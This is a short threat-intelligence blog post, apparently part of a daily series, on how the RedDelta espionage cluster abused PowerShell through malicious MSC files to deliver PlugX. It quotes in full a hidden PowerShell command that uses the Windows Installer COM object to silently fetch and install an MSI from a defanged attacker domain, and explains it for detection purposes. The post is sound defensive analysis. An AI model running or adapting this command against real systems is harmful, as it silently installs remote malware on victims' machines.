010. Do You Detect This Example of PowerShell Abuse?

Hello everyone! As you know, PowerShell can be used by the adversary to solve lots of problems, and it's almost impossible to cover all available procedures. Today we are going to look at another curious example of PowerShell abuse.

Recently Recorded Future released a report on RedDelta (we track this cluster of espionage activity as Horned Werewolf), which targeted Taiwan, Mongolia, and Southeast Asia with PlugX.

Just like Sticky Werewolf we discussed a few days ago, the adversary leveraged maicious MSC files. These files abused PowerShell to install an malicious MSI file from a remote resource:

powershell.exe -w hidden ($ceed=new-object -comobject ‘WindowsInstaller.Installer’); ($ceed.uilevel = 2); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’,’REMOVE=ALL’)); ($ceed.installproduct(‘https[:]//versaillesinfo[.]com/brjwcabz’))

Make note that malicious MSI file don't have an .msi extension. The threat actors leveraged Installer object to silently (Installer.UILevel = 2) remove (REMOVE=ALL) and then install malicious MSI file.

The MSI file drops three files related to a customized PlugX variant.

Yes, it's almost to cover all available PowerShell abuse variations, so it's important to cover at least those used by real adversaries.

See you tomorrow!

Comments

Popular posts from this blog

033. Free Google Threat Intelligence Course

001. The Zeltser Challenge

012. They Want to Know Everything About Your System!